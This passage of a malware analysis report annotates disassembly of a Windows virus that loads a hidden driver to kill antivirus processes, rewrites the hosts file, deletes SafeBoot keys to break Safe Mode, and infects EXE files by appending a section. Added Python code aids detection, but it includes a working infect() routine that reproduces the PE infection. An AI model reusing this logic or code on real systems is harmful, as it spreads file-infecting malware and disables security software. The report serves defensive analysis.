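    names = []
    pos = 0
    while pos < len(data):
        end = data.find(b"\0", pos)
        if end == -1:
            end = len(data)          # unterminated tail: treat as last string
        if end == pos:
            break                    # empty string terminates the list
        names.append(data[pos:end].decode("ascii", "replace"))
        pos = end + 1
    return names


def hijack_candidates(netsvcs_blob, pipe_string):
    """Service names the fallback would try to create and back with the
    replaced DLL: every netsvcs entry except the one equal
    (case-insensitively, as lstrcmpiA compares) to the pipe string."""
    return [n for n in walk_multi_sz(netsvcs_blob)
            if n.lower() != pipe_string.lower()]


if __name__ == "__main__":
    print(decode_stack_string([0x7374656E, 0x736376]))        # netsvcs
    print(hijack_candidates(SAMPLE_NETSVCS, "Browser"))
```

The skip is what the listing intends; as noted in the comments above, the listed code jumps back to GetNext_1 on a match without advancing lpString, so the Python models the evident intent rather than that loop.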

This concludes the EXE-mode functionality. Next is what the program does when running as a DLL. First, CreateBin checks internally whether the current process name is \; if it is not, the code looks for the avp.exe and bdagent.exe processes. The search is a plain comparison over the enumerated process names, so that part is not reproduced here:

.text:0040540D push offset aAvp_exe ; "avp.exe"
.text:00405412 call CheckProcess
.text:00405417 test eax, eax
.text:00405419 jnz short GoWriteNop ; found: write a block of 0x90 bytes, then delete
.text:0040541B push offset aBdagent_exe ; "bdagent.exe"
.text:00405420 call CheckProcess ; look for the two AV processes by enumerating processes
.text:00405425 test eax, eax
.text:00405427 jz short GoRevertData
.text:00405429 GoWriteNop:
.text:00405429 call WriteNop ; write a block of 0x90 (NOP) bytes, then delete

Next it decodes a series of embedded strings: AV process names, network user names and weak passwords, URLs and so on. When that is done it creates the driver file \ (Forter.sys, from the string name aForter_sys) in the temp folder:

.text:004054D7 push offset TempPath ; lpBuffer
.text:004054DC push 104h ; nBufferLength
.text:004054E1 call ds:GetTempPathA
.text:004054E7 push 104h ; size_t
.text:004054EC push 0 ; int
.text:004054EE push offset SystemDirector ; void *
.text:004054F3 call memset
.text:004054F8 add esp, 0Ch
.text:004054FB push 104h ; uSize
.text:00405500 push offset SystemDirector ; lpBuffer
.text:00405505 call ds:GetSystemDirectoryA
.text:0040550B push 104h ; size_t
.text:00405510 push 0 ; int
.text:00405512 lea eax, [ebp+FileName]
.text:00405518 push eax ; void *
.text:00405519 call memset
.text:0040551E add esp, 0Ch
.text:00405521 push offset aForter_sys ; \ (Forter.sys)
.text:00405526 push offset TempPath
.text:0040552B push offset aSS_0 ; \ (format string)
.text:00405530 lea eax, [ebp+FileName]
.text:00405536 push eax
.text:00405537 call [ebp+wsprintfA] ; <temp folder>\Forter.sys
.text:0040553A add esp, 10h
.text:0040553D push 80h ; int
.text:00405542 push 65h ; int (resource id 0x65 = 101 and type/flag 0x80; which is which is not shown)
.text:00405544 push hModule ; hModule
.text:0040554A lea eax, [ebp+FileName]
.text:00405550 push eax ; int
.text:00405551 call CallLoadResource ; write the embedded resource to the temp folder as the driver file
.text:00405556 lea eax, [ebp+FileName]
.text:0040555C push eax ; lpBinaryPathName
.text:0040555D call StartService_1 ; create and start the driver service for \
.text:00405562 push 400h ; size_t
.text:00405567 push 0 ; int
.text:00405569 lea eax, [ebp+String]
.text:0040556F push eax ; void *
.text:00405570 call memset
.text:00405575 add esp, 0Ch
.text:00405578 push offset DisplayName ; \
.text:0040557D push off_40B548 ; \
.text:00405583 push offset aSS ; \ (format string)
.text:00405588 lea eax, [ebp+String]
.text:0040558E push eax ; LPSTR
.text:0040558F call ds:wsprintfA
.text:00405595 add esp, 10h
.text:00405598 lea eax, [ebp+String]
.text:0040559E push eax
.text:0040559F push 80000002h ; HKEY_LOCAL_MACHINE
.text:004055A4 call [ebp+SHDeleteKeyA] ; delete SYSTEM\CurrentControlSet\Services\Forter
.text:004055AA lea eax, [ebp+FileName]
.text:004055B0 push eax ; lpFileName
.text:004055B1 call ds:DeleteFileA ; delete the \ file from the temp folder

Once the driver is loaded, both its service key and the file on disk are removed, so the driver survives only in memory. On a live system it has to be found through the loaded-driver list rather than through the Services key or the temp directory.

Next it terminates anti-virus software. The AV process names (the same list as in section 2, reproduced as stored in the sample):

KVMonXP.kxp, KVSrvXP.exe, avp.exe, avp.exe, avp.exe, RavMonD.exe, RavTask.exe, RsAgent.exe, rsnetsvr.exe, RsTray.exe, ScanFrm.exe, CCenter.exe, kavstart.exe, kissvc.exe, kpfw32.exe, kpfwsvc.exe, kswebshield.exe, kwatch.exe, kmailmon.exe, egui.exe, ekrn.exe, ccSvcHst.exe, ccSvcHst.exe, ccSvcHst.exe, Mcagent.exe, mcmscsvc.exe, McNASvc.exe, Mcods.exe, McProxy.exe, Mcshield.exe, mcsysmon.exe, mcvsshld.exe, MpfSrv.exe, McSACore.exe, msksrver.exe, sched.exe, avguard.exe, avmailc.exe, avwebgrd.exe, avgnt.exe, sched.exe, avguard.exe, avcenter.exe, UfSeAgnt.exe, TMBMSRV.exe, SfCtlCom.exe, TmProxy.exe, 360SoftMgrSvc.exe, 360tray.exe, qutmserv.exe, bdagent.exe, livesrv.exe, seccenter.exe, vsserv.exe, MPSVC.exe, MPSVC1.exe, MPSVC2.exe, MPMon.exe, ast.exe, 360speedld.exe, 360SoftMgrSvc.exe, 360tray.exe, 修复工具.exe, 360hotfix.exe, 360rpt.exe, 360safe.exe, 360safebox.exe, krnl360svc.exe, zhudongfangyu.exe, 360sd.exe, 360rp.exe, 360se.exe, safeboxTray.exe.

The kill procedure: for each name, up to four times, CheckProcess is called and, if the process exists, its 4-byte result is sent to the driver with IOCTL 0x222264:

.text:0040528C mov [ebp+AntiVirsName], offset AntiVName ; first AV name
.text:00405293 Next_2:
.text:00405293 mov eax, [ebp+AntiVirsName]
.text:00405296 movsx eax, byte ptr [eax]
.text:00405299 test eax, eax
.text:0040529B jz Over_2 ; empty string: end of the list
.text:004052A1 and [ebp+var_8], 0
.text:004052A5 jmp short loc_4052AE
.text:004052A7 Next_1:
.text:004052A7 mov eax, [ebp+var_8]
.text:004052AA inc eax
.text:004052AB mov [ebp+var_8], eax
.text:004052AE loc_4052AE:
.text:004052AE cmp [ebp+var_8], 4 ; at most 4 attempts per name
.text:004052B2 jge short GoNext
.text:004052B4 mov [ebp+var_C], 1
.text:004052BB and [ebp+InBuffer], 0
.text:004052BF and [ebp+BytesReturned], 0
.text:004052C3 push [ebp+AntiVirsName] ; current AV process name
.text:004052C6 call CheckProcess ; is this process running? (non-zero result)
.text:004052CB mov [ebp+InBuffer], eax
.text:004052CE cmp [ebp+InBuffer], 0
.text:004052D2 jnz short loc_4052D6 ; running: ask the driver to terminate it
.text:004052D4 jmp short GoNext ; not running: take the next name
.text:004052D6 loc_4052D6:
.text:004052D6 push 0 ; lpOverlapped
.text:004052D8 lea eax, [ebp+BytesReturned]
.text:004052DB push eax ; lpBytesReturned
.text:004052DC push 0 ; nOutBufferSize
.text:004052DE push 0 ; lpOutBuffer
.text:004052E0 push 4 ; nInBufferSize
.text:004052E2 lea eax, [ebp+InBuffer]
.text:004052E5 push eax ; lpInBuffer: the 4-byte value returned by CheckProcess
.text:004052E6 push 222264h ; dwIoControlCode
.text:004052EB push [ebp+hDevice] ; hDevice
.text:004052EE call ds:DeviceIoControl ; send the kill IOCTL to the driver
.text:004052F4 mov [ebp+var_C], eax
.text:004052F7 cmp [ebp+var_C], 0
.text:004052FB jnz short SucessControl ; IOCTL succeeded
.text:004052FD jmp short GoNext
.text:004052FF SucessControl:
.text:004052FF push 32h ; dwMilliseconds
.text:00405301 call ds:Sleep
.text:00405307 jmp short Next_1 ; check again (up to 4 times)
.text:00405309 GoNext:
.text:00405309 push 32h ; dwMilliseconds
.text:0040530B call ds:Sleep
.text:00405311 push [ebp+AntiVirsName] ; lpString
.text:00405314 call ds:lstrlenA
.text:0040531A mov ecx, [ebp+AntiVirsName]
.text:0040531D lea eax, [ecx+eax+1]
.text:00405321 mov [ebp+AntiVirsName], eax ; next AV name
.text:00405324 jmp Next_2
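The control code 0x222264 is built with the CTL_CODE macro, so its fields can be read back, which tells you what to look for in the driver's dispatch routine and what to match on in an ETW or hook-based monitor. The Python below is an added example, not code from the report or the sample; the only device-type name it knows is the one this code uses, and the other constants are the standard CTL_CODE definitions.

```python
# CTL_CODE(DeviceType, Function, Method, Access) =
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
METHOD = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
          2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS | FILE_WRITE_ACCESS"}
DEVICE = {0x22: "FILE_DEVICE_UNKNOWN"}   # only the type used by this sample is named


def decode_ioctl(code):
    """Split a DeviceIoControl code into its CTL_CODE fields.
    Function codes >= 0x800 and device types >= 0x8000 are reserved for
    third parties, which is the usual sign of a custom (here: malicious)
    driver interface rather than a Windows-defined one."""
    device_type = code >> 16
    function = (code >> 2) & 0xFFF
    return {
        "device_type": device_type,
        "device_name": DEVICE.get(device_type, f"0x{device_type:X}"),
        "access": ACCESS[(code >> 14) & 3],
        "function": function,
        "method": METHOD[code & 3],
        "vendor_defined": device_type >= 0x8000 or function >= 0x800,
    }


def ctl_code(device_type, function, method=0, access=0):
    """Inverse of decode_ioctl, for checking a hypothesis about a code."""
    if not (0 <= function <= 0xFFF and 0 <= method <= 3 and 0 <= access <= 3):
        raise ValueError("field out of range")
    return (device_type << 16) | (access << 14) | (function << 2) | method


if __name__ == "__main__":
    for k, v in decode_ioctl(0x222264).items():
        print(f"{k:15} {v}")
```

For 0x222264 this gives FILE_DEVICE_UNKNOWN, function 0x899, METHOD_BUFFERED, FILE_ANY_ACCESS: a vendor-range function on the catch-all device type, with a 4-byte buffered input, which is exactly the shape of the call in the listing.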

It hijacks drivers\etc\hosts to block a series of web sites:

.text:004066DE mov [ebp+lpBuffer], offset a127_0_0_1Local ; "127.0.0.1 localhost\r\n" followed by the blocked host entries (cut off here)
.text:004066E5 and [ebp+NumberOfBytesWritten], 0
.text:004066E9 or [ebp+hObject], 0FFFFFFFFh
.text:004066ED push 104h ; size_t
.text:004066F2 push 0 ; int
.text:004066F4 lea eax, [ebp+FileName]
.text:004066FA push eax ; void *
.text:004066FB call memset
.text:00406700 add esp, 0Ch
.text:00406703 push offset SystemDirector
.text:00406708 push offset aSDriversEtcHos ; \ (IDA's name suggests "%s\drivers\etc\hosts")
.text:0040670D lea eax, [ebp+FileName]
.text:00406713 push eax ; LPSTR
.text:00406714 call ds:wsprintfA
.text:0040671A add esp, 0Ch
.text:0040671D push 0 ; hTemplateFile
.text:0040671F push 80h ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
.text:00406724 push 3 ; dwCreationDisposition = OPEN_EXISTING
.text:00406726 push 0 ; lpSecurityAttributes
.text:00406728 push 3 ; dwShareMode = FILE_SHARE_READ | FILE_SHARE_WRITE
.text:0040672A push 0C0000000h ; dwDesiredAccess = GENERIC_READ | GENERIC_WRITE
.text:0040672F lea eax, [ebp+FileName]
.text:00406735 push eax ; lpFileName
.text:00406736 call ds:CreateFileA
.text:0040673C mov [ebp+hObject], eax
.text:0040673F push 0 ; lpOverlapped
.text:00406741 lea eax, [ebp+NumberOfBytesWritten]
.text:00406744 push eax ; lpNumberOfBytesWritten
.text:00406745 push [ebp+lpBuffer] ; lpString
.text:00406748 call ds:lstrlenA
.text:0040674E push eax ; nNumberOfBytesToWrite
.text:0040674F push [ebp+lpBuffer] ; lpBuffer
.text:00406752 push [ebp+hObject] ; hFile
.text:00406755 call ds:WriteFile ; write "127.0.0.1 localhost\r\n" plus the block list from offset 0

Because the file is opened with OPEN_EXISTING and written from offset 0 without SetEndOfFile, any previous hosts content that extends beyond the new block survives after it, possibly as a partial line.
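A hosts check for this kind of tampering has to flag names other than localhost mapped to a sinkhole address, and it must not choke on the truncated leftover line that an overwrite-without-truncate leaves behind. The Python below is an added example, not code from the report or the sample; the hosts content, including the vendor-looking names and the leftover "6.7 ..." fragment, is constructed for the demonstration.

```python
import ipaddress

SINKHOLE = {"127.0.0.1", "0.0.0.0", "::1"}
# names that legitimately point at loopback
EXPECTED_LOOPBACK = {"localhost", "localhost.localdomain",
                     "ip6-localhost", "ip6-loopback", "broadcasthost"}

# Constructed hosts file as the infected machine would have it: the written
# block, then a fragment of the old file that the write did not cover.
SAMPLE_HOSTS = (
    "127.0.0.1 localhost\r\n"
    "127.0.0.1 update.av-vendor.example\r\n"
    "127.0.0.1 www.av-vendor.example download.av-vendor.example\r\n"
    "# old comment line\r\n"
    "6.7 oldintranet.example\n"          # leftover: tail of "10.5.6.7 ..." cut mid-token
)


def parse_hosts(text):
    """Return (ip, hostname) pairs. Accepts CRLF or LF, strips comments,
    and skips lines whose first token is not an IP address, which is how
    the partial line left by the overwrite shows up."""
    entries = []
    for raw in text.replace("\r\n", "\n").split("\n"):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = str(ipaddress.ip_address(parts[0]))
        except ValueError:
            continue                     # "6.7" is not an address: junk fragment
        for name in parts[1:]:
            entries.append((ip, name))
    return entries


def sinkholed_names(text):
    """Hostnames steered to loopback/null that are not expected there."""
    return [(ip, name) for ip, name in parse_hosts(text)
            if ip in SINKHOLE and name.lower() not in EXPECTED_LOOPBACK]


if __name__ == "__main__":
    for ip, name in sinkholed_names(SAMPLE_HOSTS):
        print(f"suspicious: {name} -> {ip}")
```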

It deletes registry keys to break Safe Mode (the two SafeBoot keys named in section 2):

.text:00406963 push offset pszSubKey ; SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
.text:00406968 push 80000002h ; hkey = HKEY_LOCAL_MACHINE
.text:0040696D call ds:SHDeleteKeyA
.text:00406973 push offset aSystemCurren_0 ; SYSTEM\CurrentControlSet\Control\SafeBoot\Network
.text:00406978 push 80000002h ; hkey = HKEY_LOCAL_MACHINE
.text:0040697D call ds:SHDeleteKeyA ; deleting both SafeBoot keys breaks Safe Mode

Next comes file infection. It first checks whether WinRAR's Rar.exe is present (needed later for infecting RAR archives):

.text:0040634A push offset aCProgramFilesW ; "C:\Program Files\WinRAR\Rar.exe"
.text:0040634F push offset pszPath ; lpString1
.text:00406354 call ds:lstrcpyA
.text:0040635A push offset pszPath ; pszPath
.text:0040635F call ds:PathFileExistsA
.text:00406365 mov CRar_exe, eax ; remember whether Rar.exe exists

Then it queries the drive type, skipping invalid drives and CD-ROMs; on those it goes back for the next drive. Removable (2), fixed (3) and network (4) drives all pass this filter, which is how the removable-media spread in section 2 comes about.

.text:004063C3 push [ebp+lpString] ; lpRootPathName
.text:004063C6 call ds:GetDriveTypeA ; get the drive type
.text:004063CC mov [ebp+DriveType], eax
.text:004063CF cmp [ebp+DriveType], 1 ; DRIVE_NO_ROOT_DIR
.text:004063D3 jbe short Next_2 ; DRIVE_UNKNOWN or DRIVE_NO_ROOT_DIR: skip
.text:004063D5 cmp [ebp+DriveType], 5 ; DRIVE_CDROM
.text:004063D9 jz short Next_2 ; CD-ROM: skip

For a usable drive it starts a thread that infects the files on it:

.text:004063DB push 0 ; lpThreadId
.text:004063DD push 0 ; dwCreationFlags
.text:004063DF mov eax, [ebp+lpString]
.text:004063E2 push dword ptr [eax] ; lpParameter: the drive path
.text:004063E4 push offset TaintFile_1 ; lpStartAddress: the infection thread
.text:004063E9 push 0 ; dwStackSize
.text:004063EB push 0 ; lpThreadAttributes
.text:004063ED call [ebp+CreateThread]

Before infecting, the directory name is checked against a table of excluded system directories so that system files are not infected: WinRAR, WindowsUpdate, Windows NT, Windows Media Player, Outlook Express, NetMeeting, MSN Gaming Zone, Movie Maker, microsoft frontpage, Messenger, Internet Explorer, InstallShield Installation Information, ComPlus Applications, Common Files, RECYCLER, System Volume Information, Documents and Settings, WinNT, WINDOWS. The loop below iterates 0x15 (21) table entries, so the table holds a couple of names beyond the 19 listed. The comparison is lstrcmpiA on the whole name, i.e. case-insensitive but exact: only directories with exactly these names are skipped.

.text:00406220 NextSysFlod:
.text:00406220 mov eax, [ebp+var_35C]
.text:00406226 inc eax
.text:00406227 mov [ebp+var_35C], eax
.text:0040622D loc_40622D:
.text:0040622D cmp [ebp+var_35C], 15h ; 0x15 (21) table entries
.text:00406234 jge short loc_40625A
.text:00406236 mov eax, [ebp+var_35C]
.text:0040623C push lpString2[eax*4] ; lpString2: table entry
.text:00406243 push [ebp+lpString1] ; lpString1: the directory name
.text:00406249 call ds:lstrcmpiA ; compare with the excluded system directories
.text:0040624F test eax, eax
.text:00406251 jnz short Next_1
.text:00406253 jmp GoOutReturn ; match: leave, do not infect files in this directory
.text:00406258 Next_1:
.text:00406258 jmp short NextSysFlod

It then walks the file system with FindFirstFile and FindNextFile and calls the infection routine for each file it finds.

Below is the main procedure for infecting an EXE. The file is mapped with a file mapping; in the mapping the section count, SizeOfImage and the entry point are changed and a new section named .tc is added. The code then seeks to the end of the file and writes the shellcode and the original OEP there.

Building the new section header. By their offsets in the 0x28-byte header being assembled, var_50 is PointerToRawData (offset 0x14), var_42 is NumberOfLinenumbers (offset 0x22) and var_40 is Characteristics (offset 0x24):

.text:0040727B mov eax, [ebp+EndOfLastTriv]
.text:00407281 mov [ebp+var_50], eax ; PointerToRawData = end of the last existing section
.text:00407284 mov [ebp+var_40], 0E0000020h ; Characteristics = IMAGE_SCN_CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE
.text:0040728B mov ax, word ptr byte_40BE6C
.text:00407291 mov [ebp+var_42], ax ; 2-byte marker in NumberOfLinenumbers, the same 2 bytes written to the pipe earlier
.text:00407295 push 28h ; size_t = sizeof(IMAGE_SECTION_HEADER)
.text:00407297 lea eax, [ebp+ct.] ; the new .tc section header
.text:0040729A push eax ; void *
.text:0040729B mov eax, [ebp+NTAddress]
.text:004072A1 add eax, [ebp+NTSecLen]
.text:004072A4 push eax ; void *: end of the existing section table
.text:004072A5 call memcpy ; append the new section header
.text:004072AA add esp, 0Ch
.text:004072AD mov eax, [ebp+NTAddress]
.text:004072B3 movzx eax, word ptr [eax+6] ; FileHeader.NumberOfSections
.text:004072B7 inc eax ; one more section
.text:004072B8 mov ecx, [ebp+NTAddress]
.text:004072BE mov [ecx+6], ax
.text:004072C2 mov eax, [ebp+NTAddress]
.text:004072C8 cmp dword ptr [eax+1Ch], 0 ; OptionalHeader.SizeOfCode
.text:004072CC jz short WriteShellCode ; zero: go straight to writing the shellcode
.text:004072E3 mov eax, [ebp+NTAddress] ; the NT headers
.text:004072E9 mov ecx, [ebp+EndOfShellCode]
.text:004072EC mov [eax+28h], ecx ; OptionalHeader.AddressOfEntryPoint = new entry point
.text:004072EF mov eax, [ebp+NTAddress]
.text:004072F5 mov eax, [eax+50h]
.text:004072F8 add eax, [ebp+var_5C]
.text:004072FB mov ecx, [ebp+NTAddress]
.text:00407301 mov [ecx+50h], eax ; OptionalHeader.SizeOfImage += var_5C (offset 0x50 is SizeOfImage, not the import table as the original comment said)
.text:00407304 push [ebp+lpBaseAddress] ; lpBaseAddress
.text:00407307 call ds:UnmapViewOfFile

.text:0040731E push 2 ; dwMoveMethod = FILE_END
.text:00407320 push 0 ; lpDistanceToMoveHigh
.text:00407322 mov eax, [ebp+SplcaeEnd]
.text:00407328 add eax, [ebp+var_54]
.text:0040732B push eax ; lDistanceToMove
.text:0040732C push [ebp+hFile] ; hFile
.text:0040732F call ds:SetFilePointer
.text:00407335 push [ebp+hFile] ; hFile
.text:00407338 call ds:SetEndOfFile ; grow the file to hold the new section
.text:0040733E push 2 ; dwMoveMethod = FILE_END
.text:00407340 push 0 ; lpDistanceToMoveHigh
.text:00407342 xor eax, eax
.text:00407344 sub eax, [ebp+var_54]
.text:00407347 push eax ; lDistanceToMove = -var_54
.text:00407348 push [ebp+hFile] ; hFile
.text:0040734B call ds:SetFilePointer ; seek to the start of the new section data
.text:00407351 push 0 ; lpOverlapped
.text:00407353 lea eax, [ebp+NumberOfBytesWritten]
.text:00407356 push eax ; lpNumberOfBytesWritten
.text:00407357 push 297h ; nNumberOfBytesToWrite = 0x297 (663) bytes
.text:0040735C push offset loc_409BA8 ; lpBuffer: the infection stub
.text:00407361 push [ebp+hFile] ; hFile
.text:00407364 call ds:WriteFile ; write the stub that infected EXEs start with
.text:0040736A push 0 ; lpOverlapped
.text:0040736C lea eax, [ebp+NumberOfBytesWritten]
.text:0040736F push eax ; lpNumberOfBytesWritten
.text:00407370 push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
.text:00407376 push lpBuffer ; lpBuffer: the virus body
.text:0040737C push [ebp+hFile] ; hFile
.text:0040737F call ds:WriteFile ; write the body right after the stub
.text:00407385 push 1 ; dwMoveMethod = FILE_CURRENT
.text:00407387 push 0 ; lpDistanceToMoveHigh
.text:00407389 xor eax, eax
.text:0040738B sub eax, nNumberOfBytesToWrite
.text:00407391 sub eax, 2Bh
.text:00407394 push eax ; lDistanceToMove = -(body length + 0x2B), i.e. stub offset 0x26C
.text:00407395 push [ebp+hFile] ; hFile
.text:00407398 call ds:SetFilePointer
.text:0040739E push 0 ; lpOverlapped
.text:004073A0 lea eax, [ebp+NumberOfBytesWritten]
.text:004073A3 push eax ; lpNumberOfBytesWritten
.text:004073A4 push 4 ; nNumberOfBytesToWrite
.text:004073A6 push offset nNumberOfBytesToWrite ; lpBuffer: the body length
.text:004073AB push [ebp+hFile] ; hFile
.text:004073AE call ds:WriteFile ; patch the body length into the stub
.text:004073B4 mov eax, [ebp+EndOfShellCode]
.text:004073B7 add eax, 297h
.text:004073BC mov ecx, [ebp+OEP] ; the original entry point
.text:004073C2 sub ecx, eax
.text:004073C4 mov [ebp+Buffer], ecx ; OEP - (EndOfShellCode + 0x297): OEP relative to the end of the stub
.text:004073C7 push 2 ; dwMoveMethod = FILE_END
.text:004073C9 push 0 ; lpDistanceToMoveHigh
.text:004073CB xor eax, eax
.text:004073CD sub eax, [ebp+var_54]
.text:004073D0 push eax ; lDistanceToMove = -var_54
.text:004073D1 push [ebp+hFile] ; hFile
.text:004073D4 call ds:SetFilePointer ; back to the start of the stub
.text:004073DA push 1 ; dwMoveMethod = FILE_CURRENT
.text:004073DC push 0 ; lpDistanceToMoveHigh
.text:004073DE push 293h ; lDistanceToMove: stub offset 0x293
.text:004073E3 push [ebp+hFile] ; hFile
.text:004073E6 call ds:SetFilePointer
.text:004073EC push 0 ; lpOverlapped
.text:004073EE lea eax, [ebp+NumberOfBytesWritten]
.text:004073F1 push eax ; lpNumberOfBytesWritten
.text:004073F2 push 4 ; nNumberOfBytesToWrite
.text:004073F4 lea eax, [ebp+Buffer]
.text:004073F7 push eax ; lpBuffer
.text:004073F8 push [ebp+hFile] ; hFile
.text:004073FB call ds:WriteFile ; write the relative OEP into the last 4 bytes of the stub
.text:00407401 push 1 ; int
.text:00407403 lea eax, [ebp+CreationTime]
.text:00407409 push eax ; lpCreationTime
.text:0040740A push [ebp+hFile] ; hFile
.text:0040740D call FileOldTime ; set the infected file's timestamps back to their original values

Taken together, the offsets give the layout of the appended data: a 0x297-byte stub, immediately followed by the virus body, with the body length stored at stub offset 0x26C and the OEP at stub offset 0x293. Since 0x293 + 4 = 0x297 and the stored value is OEP minus the address of the end of the stub, the field is consistent with the rel32 operand of a jmp at the very end of the stub that returns control to the original entry point. The host's size and timestamps are the two things the infection tries to hide, the latter via FileOldTime.
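The structural changes above (an extra section at the end of the table, NumberOfSections+1, SizeOfImage grown, entry point moved into a trailing RWX section, a stub whose last dword is a rel32 back to the OEP) are what a scanner can check without running anything. The Python below is an added example, not code from the report or from the sample: it builds a minimal constructed PE32, applies the on-disk changes described in the listing in simplified form (the new section starts at the old end of file; the stub body is NOP filler rather than the sample's loader; the 2-byte marker is assumed to be "DD"), and then shows the detection and OEP recovery. The assumed detail is that EndOfShellCode equals the RVA of the new section, which is what makes rel32 = OEP - (entry + 0x297).

```python
import struct

SEC = struct.Struct("<8sIIIIIIHHI")            # IMAGE_SECTION_HEADER, 40 bytes
MARKER = b"DD"                                   # assumed value of the 2 bytes at byte_40BE6C
STUB_LEN, LEN_OFF, REL_OFF = 0x297, 0x26C, 0x293  # offsets taken from the listing
SECT_ALIGN = FILE_ALIGN = 0x200                  # constructed; the sample's alignment code is not shown


def align(v, a):
    return (v + a - 1) // a * a


def nt_off(pe):
    return struct.unpack_from("<I", pe, 0x3C)[0]          # e_lfanew


def sections(pe):
    nt = nt_off(pe)
    n = struct.unpack_from("<H", pe, nt + 6)[0]            # FileHeader.NumberOfSections
    optsz = struct.unpack_from("<H", pe, nt + 0x14)[0]     # FileHeader.SizeOfOptionalHeader
    base = nt + 0x18 + optsz
    return [SEC.unpack_from(pe, base + i * SEC.size) for i in range(n)]


def size_of_image(pe):
    return struct.unpack_from("<I", pe, nt_off(pe) + 0x50)[0]


def build_clean_pe(oep=0x1010):
    """Constructed minimal PE32: DOS header, NT headers, one .text section."""
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 0x10, oep)                 # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x400000)            # ImageBase
    struct.pack_into("<II", opt, 0x20, SECT_ALIGN, FILE_ALIGN)
    struct.pack_into("<II", opt, 0x38, 0x2000, 0x200)      # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 0x5C, 16)                  # NumberOfRvaAndSizes
    fh = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    text = SEC.pack(b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x40 + 4 + len(fh) + len(opt) + SEC.size] = b"PE\0\0" + fh + opt + text
    return bytes(hdr) + b"\xCC" * 0x200                    # .text raw data (int3 filler)


def infect(pe, body):
    """Apply the changes from the listing: append a .tc header, bump
    NumberOfSections, grow SizeOfImage, move the entry point into the stub,
    then append stub + body with the body length at stub+0x26C and a rel32
    to the OEP at stub+0x293."""
    pe = bytearray(pe)
    nt = nt_off(pe)
    secs = sections(pe)
    last = secs[-1]
    oep = struct.unpack_from("<I", pe, nt + 0x28)[0]
    raw_ptr = len(pe)                                      # like EndOfLastTriv
    rva = align(last[2] + last[1], SECT_ALIGN)             # past the last section's VA range
    payload = bytearray(b"\x90" * STUB_LEN) + body
    size = align(len(payload), FILE_ALIGN)
    payload += b"\0" * (size - len(payload))
    struct.pack_into("<I", payload, LEN_OFF, len(body))
    struct.pack_into("<i", payload, REL_OFF, oep - (rva + STUB_LEN))
    marker = struct.unpack("<H", MARKER)[0]
    hdr = SEC.pack(b".tc", size, rva, size, raw_ptr, 0, 0, 0, marker, 0xE0000020)
    pos = nt + 0x18 + struct.unpack_from("<H", pe, nt + 0x14)[0] + len(secs) * SEC.size
    pe[pos:pos + SEC.size] = hdr
    struct.pack_into("<H", pe, nt + 6, len(secs) + 1)
    struct.pack_into("<I", pe, nt + 0x28, rva)
    struct.pack_into("<I", pe, nt + 0x50, size_of_image(pe) + size)
    return bytes(pe + payload)


def scan(pe):
    """Flag a file whose entry point lies in a trailing writable+executable
    section that is named .tc or carries the marker in NumberOfLinenumbers,
    and recover the OEP from the stub's final rel32."""
    secs = sections(pe)
    if not secs:
        return None
    name, vsize, rva, _, rawptr, _, _, _, nlines, chars = secs[-1]
    ep = struct.unpack_from("<I", pe, nt_off(pe) + 0x28)[0]
    tagged = name.rstrip(b"\0") == b".tc" or nlines == struct.unpack("<H", MARKER)[0]
    rwx = chars & 0x80000000 and chars & 0x20000000
    if not (tagged and rwx and rva <= ep < rva + vsize):
        return None
    stub = rawptr + (ep - rva)
    if stub + STUB_LEN > len(pe):
        return None
    rel = struct.unpack_from("<i", pe, stub + REL_OFF)[0]
    return {"section": name.rstrip(b"\0").decode(), "entry": ep,
            "oep": (ep + STUB_LEN + rel) & 0xFFFFFFFF,
            "body_len": struct.unpack_from("<I", pe, stub + LEN_OFF)[0]}


if __name__ == "__main__":
    print(scan(infect(build_clean_pe(), b"VIRUSBODY" * 10)))
```

Recovering the OEP this way is what a disinfector needs for the EXE case: restore AddressOfEntryPoint, drop the last section header and truncate the file at its PointerToRawData. Because the infection runs FileOldTime afterwards, timestamps cannot be used to find infected files; the section table can.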

For html, htm, asp and aspx files, a string is appended at the end of the file.
